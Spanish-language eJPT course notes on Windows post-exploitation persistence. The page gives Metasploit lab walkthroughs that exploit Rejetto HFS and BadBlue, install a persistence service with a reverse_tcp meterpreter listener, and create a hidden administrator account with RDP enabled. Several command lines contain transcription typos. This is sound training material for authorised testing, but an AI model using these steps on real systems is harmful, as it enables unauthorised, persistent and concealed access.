eJPT
  • 👋Welcome
  • Tools
    • 🔭Escaneo y Enumeración
  • SECTION 1: Assessment Methodologies
    • Assessment Methodologies: Information Gathering
      • Introducción a la Recopilación de Información
        • Start Quiz
      • Passive Information Gathering
      • Active Information Gathering
    • Assessment Methodologies: Footprinting & Scanning
      • Introduction
      • Networking Primer
      • Host Discovery
      • Port Scanning
      • Evasion, Scan Performance & Output
      • Page
      • Challenges
    • Assessment Methodologies: Enumeration
      • Overview
      • SMB Lesson
      • FTP Lesson
      • SSH Lesson
      • HTTP Lesson
      • SQL Lesson
    • Assessment Methodologies: Vulnerability Assessment
      • Vulnerability Assessment
      • Course Labs
  • SECTION 2: Host & Networking Auditing
    • Assessment Methodologies: Auditing Fundamentals
      • Assessment Methodologies
      • Practice
  • SECTION 3: Host & Network Penetration Testing
    • Host & Network Penetration Testing: System/Host Based Attacks
      • Introduction to Attacks
      • Windows Vulnerabilities
      • Exploiting Windows Vulnerabilities
      • Windows Privilege Escalation
      • Windows File System Vulnerabilities
      • Windows Credential Dumping
      • Linux Vulnerabilities
      • Exploiting Linux Vulnerabilities
      • Linux Privilege Escalation
      • Linux Credential Dumping
      • Conclusion
    • Host & Network Penetration Testing: Network-Based Attacks
      • Network-Based Attacks
    • Host & Network Penetration Testing: The Metasploit Framework (MSF)
      • Metasploit
        • Metasploit Fundamentals
      • Information Gathering & Enumeration
        • Nmap
        • Enumeration
      • Vulnerability Scanning
        • MSF
        • Nessus
        • Web Apps
      • Client-Side Attacks
        • Payloads
        • Automating
      • Exploitation
        • Windows Exploitation
        • Linux Exploitation
        • Post Exploitation Fundamentals
        • Windows Post Exploitation
        • Linux Post Exploitation
      • Armitage
        • Metasploit GUIs
    • Host & Network Penetration Testing: Exploitation
      • Introduction To Exploitation
      • Vulnerability Scanning Overview
      • Exploits
        • Searching For Exploits
        • Fixing Exploits
      • Shells
      • Frameworks
      • Windows
      • Linux
      • Obfuscation
    • Host & Network Penetration Testing: Post-Exploitation
      • Introduction
      • Windows Enumeration
      • Linux Enumeration
      • Transferring Files
      • Shells
      • Escalation
        • Windows Privilege Escalation
        • Linux Privilege Escalation
      • Persistence
        • Windows Persistence
        • Linux Persistence
      • Dumping & Cracking
        • Windows Password Hashes
        • Linux Password Hashes
      • Pivoting Lesson
      • Clearing
  • Host & Network Penetration Testing: Social Engineering
    • Social Engineering
  • SECTION 4: Web Application Penetration Testing
    • Introduction to the Web & HTTP Protocol
      • Web Applications
      • HTTP Protocol
        • HTTP/S Protocol Fundamentals
        • Website Crawling & Spidering
Powered by GitBook
On this page
  • Persistence Via Services
  • Demo: Persistence Via Services
  • Quiz: Persistence Via Services
  • Persistence Via RDP
  • Demo: Persistence Via RDP
  • Quiz: Persistence Via RDP
  1. SECTION 3: Host & Network Penetration Testing
  2. Host & Network Penetration Testing: Post-Exploitation
  3. Persistence

Windows Persistence

PreviousPersistenceNextLinux Persistence

Last updated 8 months ago

Persistence Via Services

La persistencia consiste en técnicas que utilizan los adversarios para mantener el acceso a los sistemas tras reinicios, cambios de credenciales y otras interrupciones que podrían interrumpir su acceso. Las técnicas utilizadas para la persistencia incluyen cualquier cambio de acceso, acción o configuración que les permita mantener su presencia en los sistemas, como reemplazar o secuestrar código legítimo o agregar código de inicio. - MITRE ATT&CK

Obtener una presencia inicial no es suficiente, es necesario configurar y mantener un acceso persistente a los objetivos.

Nota: La técnica de persistencia que utilice deberá cumplir con las reglas de interacción establecidas y acordadas con el cliente.

Demo: Persistence Via Services

nmap -sV 10.2.31.23
msf6 > search rejetto
msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.2.31.23
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit

# Una vez tengamos el acceso al sistema podemos ejecutar la persistencia
# Persistencia por metasploit
msf6 exploit(windows/http/rejetto_hfs_exec) > search persistence_service
msf6 exploit(windows/http/rejetto_hfs_exec) > use 0

msf6 exploit(windows/tocat/persistence_service) > set LPORT 4433
msf6 exploit(windows/tocat/persistence_service) > sessions
msf6 exploit(windows/tocat/persistence_service) > set SESSIONS 1
msf6 exploit(windows/tocat/persistence_service) > exploit
# Revisar la salida y vera como se crea el servicio para la persistencia
# Tambien revisar el archivo Cleanup Meterpreter RC File
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

# Configurar oyente
msf6 > use multi/handler
msf6 exploit(mutti/handter) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(mutti/handter) > set LHOST ethl
msf6 exploit(mutti/handter) > set LPORT 4433
msf6 exploit(mutti/handter) > exploit
# salir de la sesion meterpreter
msf6 exploit(mutti/handter) > run

Quiz: Persistence Via Services

Persistence Via RDP

Demo: Persistence Via RDP

nmap -sV 10.2. 18.93
searchsploit BadBlue
msf6 > search BadBlue
msf6 > use 1
msf6 exploit(windows%http/badbtue_passthru) > set RHOSTS
msf6 exploit(windows%http/badbtue_passthru) > show options 
msf6 exploit(windows%http/badbtue_passthru) > exploit
meterpreter > getuid
meterpreter > sysinfo
meterpreter > pgrep explorer
meterpreter > migrate 4072
meterpreter > sysinfo
# Persistencia RDP
# Crear Usuario y habilitacion de RDP (getui)
# agrega al usuario al grupo de RDP y admin local
# ocultara al usuario del inicio de session
meterpreter > run getgui -e -u alexis -p hacker 1233211
        Setting user account for logon
        Adding User: alexis with Password: hacker 123321
        Hiding user from Windows Login screen
        Adding User: alexis to local group I Remote Desktop Users I
        Adding User: alexis to local group 'Administrators'

# Utilizar cliente RDP para conectarnos
root@attackdefense:—# xfreerdp /u:alexis /p:hacker_123321 /v:10.2.18.93
#cmd
whoami /priv
net user

Quiz: Persistence Via RDP

Persistence, Tactic TA0003 - Enterprise | MITRE ATT&CK®
Logo